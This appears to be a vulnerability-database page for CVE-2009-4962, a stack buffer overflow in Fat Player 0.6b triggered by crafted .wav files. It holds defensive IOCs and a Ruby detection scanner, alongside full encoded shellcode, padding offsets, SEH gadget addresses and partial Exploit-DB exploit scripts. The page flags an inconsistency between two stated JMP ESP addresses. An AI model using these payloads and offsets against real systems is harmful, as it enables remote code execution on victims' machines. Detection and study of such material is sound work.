CVE-2009-4962
Published 2010-07-28
Priority P3 · 49 · critical · 9.3 CVSS 2.0
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit code available
EPSS: 31.38% (percentile 98.1)
Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute arbitrary code via a long string in a .wav file. NOTE: some of these details are obtained from third party information.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adammo | fat_player | — | — |
No version range or fixed version is recorded for this entry; the version named in the description and in every public exploit is 0.6b.
Detection & IOCs (byte patterns extracted from the sources)
- \xeb\x06\x90\x90 (nSEH: short jump forward over the 4-byte handler address, followed by NOPs)
- \x39\x1f\xd1\x72 (0x72D11F39 in little-endian order; the msacm32.drv pop/pop/ret address)
- \x90\x90\xeb\x06 (nSEH variant: two NOPs, then the short jump; used in the 2010-10-18 script below)
- 0x0046bee3 (the FatPlayer.exe pop/pop/ret address; on disk as \xe3\xbe\x46\x00)
- \xEB\x09\x90\x90 (nSEH: short jump forward 9 bytes, followed by NOPs)
- \x1F\x22\x44\x00 (0x0044221F in little-endian order)
- 144-byte payload from the 2010-10-18 script: windows/exec, CMD=calc, x86/shikata_ga_nai encoded:
  \xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca
- The overflow is triggered by a .wav file containing a long string; the SEH record is reached after 4132 bytes of padding (the 2010-10-18 script writes 4132 filler bytes, then the 4-byte nSEH, then the handler address).
- One SEH exploit uses a pop/pop/ret gadget from msacm32.drv at 0x72D11F39 (the IOC bytes \x39\x1f\xd1\x72 in little-endian order) to redirect execution.
- An alternative SEH overwrite uses a pop/pop/ret gadget from FatPlayer.exe itself at 0x0046bee3, which avoids depending on a system DLL.
- The universal exploit uses a JMP ESP gadget inside the application, stated as 0x00442200. The IOC bytes \x1F\x22\x44\x00 listed above decode (little-endian) to 0x0044221F, not 0x00442200; the two values do not agree, so confirm against the exploit source before using either in a signature.
- Malicious .wav files crafted for this bug are padded to approximately 40000 bytes in total. Since 40 KB is small for real audio, file size alone is a weak discriminator; a RIFF chunk whose declared length disagrees with the file, or a long run of identical bytes where PCM samples should be, is a better indicator for files opened by FatPlayer 0.6b.
- The overflow offset in the universal exploit variant is 4124 bytes before the SEH record, slightly different from the 4132-byte offset in the other variants.
- A Metasploit module exists for this vulnerability (a Windows fileformat exploit delivering a crafted .wav); monitor for use of exploit/windows/fileformat/fatplayer_wav.
- The exploits were tested on Windows XP SP3. The msacm32.drv address is specific to that OS build and patch level. The FatPlayer.exe addresses are specific to that build of the binary and rely on the image loading at its preferred base, which holds on XP (no ASLR) but may not elsewhere.
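As an added example (not code from this page's exploits or from the Metasploit module), here is a Ruby scanner that looks for the markers the findings above describe in a candidate .wav: a missing or lying RIFF/WAVE chunk structure, a long run of a single byte where audio samples should be, and the nSEH stubs and gadget addresses from the IOC list. Both fixtures are constructed here; the 1024-byte run threshold is an assumption of the example, and both decodings of the JMP ESP address are included because the findings and the IOC bytes disagree.

```ruby
# Added example, not code from this page's exploits or from the Metasploit module:
# a scanner that flags the markers the findings above describe in a candidate .wav.

# Gadget addresses quoted in the findings, packed little-endian as they appear on disk.
KNOWN_GADGETS = {
  0x72D11F39 => 'pop/pop/ret in msacm32.drv (Windows XP SP3)',
  0x0046BEE3 => 'pop/pop/ret in FatPlayer.exe',
  0x00442200 => 'JMP ESP in FatPlayer.exe, address as stated in the findings',
  0x0044221F => 'JMP ESP in FatPlayer.exe, address as decoded from IOC bytes 1F 22 44 00'
}.transform_keys { |addr| [addr].pack('V') }.freeze

# nSEH stubs from the IOC list: a short jump over the SEH record padded with NOPs.
NSEH_STUBS = ["\xeb\x06\x90\x90", "\x90\x90\xeb\x06", "\xeb\x09\x90\x90"].map(&:b).freeze

# Longest run of one repeated byte tolerated before it is reported as padding. The
# threshold is an assumption of this example, not a value from the advisory or exploits.
MAX_RUN = 1024

def hexdump(bytes)
  bytes.unpack1('H*')
end

# Walk the RIFF/WAVE chunk list and report structural problems: a missing header,
# a RIFF size field that disagrees with the file, or a chunk that claims more bytes
# than remain (the "long string" the advisory describes has to be carried somewhere).
def check_riff_structure(data)
  findings = []
  ids = []
  unless data.bytesize >= 12 && data[0, 4] == 'RIFF'.b && data[8, 4] == 'WAVE'.b
    findings << 'not a RIFF/WAVE file: header missing or wrong'
    return findings
  end
  riff_size = data[4, 4].unpack1('V')
  if riff_size + 8 != data.bytesize
    findings << "RIFF size field #{riff_size} disagrees with file size #{data.bytesize}"
  end
  off = 12
  while off + 8 <= data.bytesize
    id = data[off, 4]
    size = data[off + 4, 4].unpack1('V')
    unless id.bytes.all? { |b| b.between?(0x20, 0x7e) }
      findings << "chunk id at offset #{off} is not printable ASCII"
    end
    ids << id
    if off + 8 + size > data.bytesize
      findings << "chunk #{id.inspect} declares #{size} bytes but only #{data.bytesize - off - 8} remain"
      break
    end
    off += 8 + size + (size % 2) # RIFF chunks are padded to an even length
  end
  findings << "no 'fmt ' chunk" unless ids.include?('fmt '.b)
  findings
end

# Longest run of a repeated byte as [length, byte value, start offset].
def longest_run(data)
  best = [0, 0, 0]
  i = 0
  n = data.bytesize
  while i < n
    j = i + 1
    j += 1 while j < n && data.getbyte(j) == data.getbyte(i)
    best = [j - i, data.getbyte(i), i] if j - i > best[0]
    i = j
  end
  best
end

# First occurrence of each known nSEH stub and gadget address.
def find_patterns(data)
  hits = []
  NSEH_STUBS.each do |stub|
    pos = data.index(stub)
    hits << "nSEH stub #{hexdump(stub)} at offset #{pos}" if pos
  end
  KNOWN_GADGETS.each do |packed, desc|
    pos = data.index(packed)
    hits << "address bytes #{hexdump(packed)} (#{desc}) at offset #{pos}" if pos
  end
  hits
end

# Scan one file's bytes; an empty result means nothing suspicious was seen.
def scan_wav(data)
  data = data.b
  findings = check_riff_structure(data)
  run_len, byte, run_off = longest_run(data)
  findings << format('run of %d x 0x%02x at offset %d', run_len, byte, run_off) if run_len >= MAX_RUN
  findings + find_patterns(data)
end

# Constructed benign fixture: a valid 8-bit mono PCM file with a short sample ramp.
def benign_wav
  samples = (0...64).map { |i| (i * 4) & 0xff }.pack('C*')
  fmt = [1, 1, 8000, 8000, 1, 8].pack('vvVVvv') # PCM, mono, 8 kHz, 8-bit
  body = 'WAVE'.b + 'fmt '.b + [fmt.bytesize].pack('V') + fmt +
         'data'.b + [samples.bytesize].pack('V') + samples
  'RIFF'.b + [body.bytesize].pack('V') + body
end

# Constructed fixture laid out as the findings describe: 4132 bytes of padding, the
# nSEH short jump, the FatPlayer.exe pop/pop/ret address, two filler bytes, then a
# stand-in for shellcode (INT3s, not a payload), padded out to 40000 bytes.
def crafted_sample
  buf = 'A'.b * 4132 + "\x90\x90\xeb\x06".b + [0x0046BEE3].pack('V') + 'BB'.b + "\xcc".b * 32
  buf + 'C'.b * (40_000 - buf.bytesize)
end

if __FILE__ == $PROGRAM_NAME
  targets = ARGV.empty? ? { 'benign fixture' => benign_wav, 'crafted fixture' => crafted_sample }
                        : ARGV.to_h { |p| [p, File.binread(p)] }
  targets.each do |name, data|
    findings = scan_wav(data)
    puts "#{name}: #{findings.empty? ? 'clean' : findings.join('; ')}"
  end
end
```

Run it with file paths as arguments to scan real files; with no arguments it scans the two fixtures. A hit on the packed FatPlayer.exe address (e3be4600, with its trailing null byte) next to an nSEH stub is a much stronger signal than a lone 4-byte match, which can occur by chance in real PCM data, so treat single pattern hits as leads to confirm against the chunk-structure and run-length findings.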
No detection rules found.
Exploit-DB: Fat Player 0.6b - '.wav' Local Buffer Overflow (SEH)
Published 2010-10-18
---
# Exploit Title: FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH)
# Date: 10/18/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/fatplayer/files/
# Version: 0.6 Beta
# Tested on: Windows XP SP3 EN
# CVE: N/A
#! /usr/bin/env ruby
junk = "\x41" * 4132
nSEH = "\x90\x90\xeb\x06"
SEH = [0x0046bee3].pack('V') #pop pop ret from FatPlayer.exe
junk2 = "\x42\x42"
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
payload = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc"
payload << "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
payload << "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85"
payload << "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5"
Exploit-DB: Fat Player 0.6b - '.WAV' File Processing Buffer Overflow (SEH)
Published 2010-08-09 · CVSS 9.3
---
#################################################################################################
# Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute
# arbitrary code via a long string in a .wav file. NOTE: some of these details are
# obtained from third party information.
#
# Reference:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4962
# http://xforce.iss.net/xforce/xfdb/52713
# http://sourceforge.net/projects/fatplayer/
# http://www.exploit-db.com/exploits/9495/
#
# Tested on: Windows XP SP3, FatPlayer 0.6b
#
#
# This was strictly written for educational purposes. Use it at your own risk.
# The author will not bear any responsibility for any damages whatsoever.
#
# Author: Praveen
Exploit-DB: Fat Player 0.6b - '.wav' Universal Local Buffer
Published 2009-08-24
---
#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
#Tested on Windows XP SP3 (English)
# Fat Player 0.6b(wav) Universal Local Buffer Exploit
#http://sourceforge.net/projects/fatplayer/
###################################################################
my $shellcode=
"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49".
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56".
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41".
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42".
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a".
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47".
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c".
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a
Metasploit: Fat Player Media Player 0.6b0 Buffer Overflow
This module exploits a buffer overflow in Fat Player 0.6b. When the application is used to import a specially crafted wav file, a buffer overflow occurs allowing arbitrary code execution.
No writeups or analysis indexed.
References
- http://osvdb.org/57343
- http://secunia.com/advisories/36441
- http://www.exploit-db.com/exploits/9495
- http://www.vupen.com/english/advisories/2009/2394
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52713